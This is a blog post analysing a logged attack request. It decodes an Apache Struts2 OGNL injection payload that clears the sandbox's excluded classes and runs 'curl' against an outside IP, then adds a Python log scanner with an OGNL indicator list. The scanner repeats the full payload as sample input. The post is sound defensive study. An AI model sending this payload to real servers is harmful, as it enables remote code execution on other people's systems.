Friday, December 25, 2020

Learning System Vulnerabilities from Web Logs 68

I haven't written about the web log for a long time; most of what shows up is phpMyAdmin, WordPress or NAS vulnerability attacks. In the past few days I saw something interesting: the request was actually served successfully (a normal, accessible response):

45.146.164.15 - - [22/Dec/2020:14:20:40 +0800] "GET /?id=%25%7B%28%27Powered_by_Unicode_Potats0%2Cenjoy_it%27%29.%28%23UnicodeSec+%3D+%23application%5B%27org.apache.tomcat.InstanceManager%27%5D%29.%28%23potats0%3D%23UnicodeSec.newInstance%28%27org.apache.commons.collections.BeanMap%27%29%29.%28%23stackvalue%3D%23attr%5B%27struts.valueStack%27%5D%29.%28%23potats0.setBean%28%23stackvalue%29%29.%28%23context%3D%23potats0.get%28%27context%27%29%29.%28%23potats0.setBean%28%23context%29%29.%28%23sm%3D%23potats0.get%28%27memberAccess%27%29%29.%28%23emptySet%3D%23UnicodeSec.newInstance%28%27java.util.HashSet%27%29%29.%28%23potats0.setBean%28%23sm%29%29.%28%23potats0.put%28%27excludedClasses%27%2C%23emptySet%29%29.%28%23potats0.put%28%27excludedPackageNames%27%2C%23emptySet%29%29.%28%23exec%3D%23UnicodeSec.newInstance%28%27freemarker.template.utility.Execute%27%29%29.%28%23cmd%3D%7B%27curl+93.189.44.137%2Fssa%27%7D%29.%28%23res%3D%23exec.exec%28%23cmd%29%29%7D HTTP/1.1" 200 1833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

After URL-decoding the string marked in red (the query string), we get the following:

id=%{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec = #application['org.apache.tomcat.InstanceManager']).(#potats0=#UnicodeSec.newInstance('org.apache.commons.collections.BeanMap')).(#stackvalue=#attr['struts.valueStack']).(#potats0.setBean(#stackvalue)).(#context=#potats0.get('context')).(#potats0.setBean(#context)).(#sm=#potats0.get('memberAccess')).(#emptySet=#UnicodeSec.newInstance('java.util.HashSet')).(#potats0.setBean(#sm)).(#potats0.put('excludedClasses',#emptySet)).(#potats0.put('excludedPackageNames',#emptySet)).(#exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')).(#cmd={'curl 93.189.44.137/ssa'}).(#res=#exec.exec(#cmd))}

After Googling it, I learned this is an Apache Struts2 remote command execution vulnerability. Apache Struts2 is a web framework for developing Java EE web applications; when certain tags are used, an OGNL (Object-Graph Navigation Language) injection vulnerability may exist, which allows remote command execution.

The part that deserves the most attention is this segment: (#exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')).(#cmd={'curl 93.189.44.137/ssa'}).(#res=#exec.exec(#cmd))}

It connects to 93.189.44.137/ssa; I don't know what it would execute, but my web server is very simple, and there is almost nothing on it.
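The decode-and-flag step described above (URL-decoding the query string and recognising the OGNL sandbox-bypass and Execute calls) as a small log scanner, written in Python. This is an added example and not part of the original post. It parses combined-format access log lines, repeatedly URL-decodes the query so a double-encoded payload is unwrapped too, and reports each request whose decoded query contains OGNL indicators. The log entries embedded below are the request from this post plus one constructed benign request; the indicator list is an assumption drawn from that one payload, not an exhaustive signature.

```python
import re
from urllib.parse import unquote_plus

# Combined Log Format: client - - [time] "METHOD path HTTP/x" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Indicators taken from the decoded payload in the post (assumption: this list is
# illustrative, not a complete Struts2/OGNL signature set).
OGNL_INDICATORS = [
    "%{",                                   # OGNL expression delimiter
    "#application[",                        # servlet-context object access
    "#attr[",
    "struts.valueStack",
    "memberAccess",                         # tampering with SecurityMemberAccess
    "excludedClasses",                      # emptied to disable the sandbox
    "excludedPackageNames",
    "freemarker.template.utility.Execute",  # command-execution helper
    "org.apache.commons.collections.BeanMap",
]

# Constructed sample log: line 1 is the request from the post, line 2 is a benign request.
SAMPLE_LOG = [
    '45.146.164.15 - - [22/Dec/2020:14:20:40 +0800] "GET /?id=%25%7B%28%27Powered_by_Unicode_Potats0%2Cenjoy_it%27%29.%28%23UnicodeSec+%3D+%23application%5B%27org.apache.tomcat.InstanceManager%27%5D%29.%28%23potats0%3D%23UnicodeSec.newInstance%28%27org.apache.commons.collections.BeanMap%27%29%29.%28%23stackvalue%3D%23attr%5B%27struts.valueStack%27%5D%29.%28%23potats0.setBean%28%23stackvalue%29%29.%28%23context%3D%23potats0.get%28%27context%27%29%29.%28%23potats0.setBean%28%23context%29%29.%28%23sm%3D%23potats0.get%28%27memberAccess%27%29%29.%28%23emptySet%3D%23UnicodeSec.newInstance%28%27java.util.HashSet%27%29%29.%28%23potats0.setBean%28%23sm%29%29.%28%23potats0.put%28%27excludedClasses%27%2C%23emptySet%29%29.%28%23potats0.put%28%27excludedPackageNames%27%2C%23emptySet%29%29.%28%23exec%3D%23UnicodeSec.newInstance%28%27freemarker.template.utility.Execute%27%29%29.%28%23cmd%3D%7B%27curl+93.189.44.137%2Fssa%27%7D%29.%28%23res%3D%23exec.exec%28%23cmd%29%29%7D HTTP/1.1" 200 1833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"',
    '203.0.113.7 - - [22/Dec/2020:14:21:05 +0800] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


def decode_query(path):
    """Return the fully URL-decoded query string of a request path ('' if there is none).

    Decoding repeats until the string stops changing, so %2528 -> %28 -> '(' is also
    unwrapped; unquote_plus only ever shortens or preserves the string, so this terminates.
    """
    query = path.split("?", 1)[1] if "?" in path else ""
    previous = None
    while query != previous:
        previous, query = query, unquote_plus(query)
    return query


def ognl_indicators(decoded_query):
    """Return the indicators present in an already-decoded query string."""
    return [ind for ind in OGNL_INDICATORS if ind in decoded_query]


def scan_log(lines):
    """Parse access-log lines and return one dict per request carrying OGNL indicators."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined-format; skip rather than guess
        decoded = decode_query(m.group("path"))
        matched = ognl_indicators(decoded)
        if matched:
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "status": int(m.group("status")),
                "indicators": matched,
                "query": decoded,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        # A 200 on such a request is the detail worth following up, as in the post.
        print(f"{hit['time']} {hit['ip']} status={hit['status']} indicators={len(hit['indicators'])}")
        print("  decoded:", hit["query"][:120], "...")
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines; a hit is a request to investigate, while the HTTP status tells you whether the application answered the request (as it did here) rather than whether the expression was actually evaluated.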
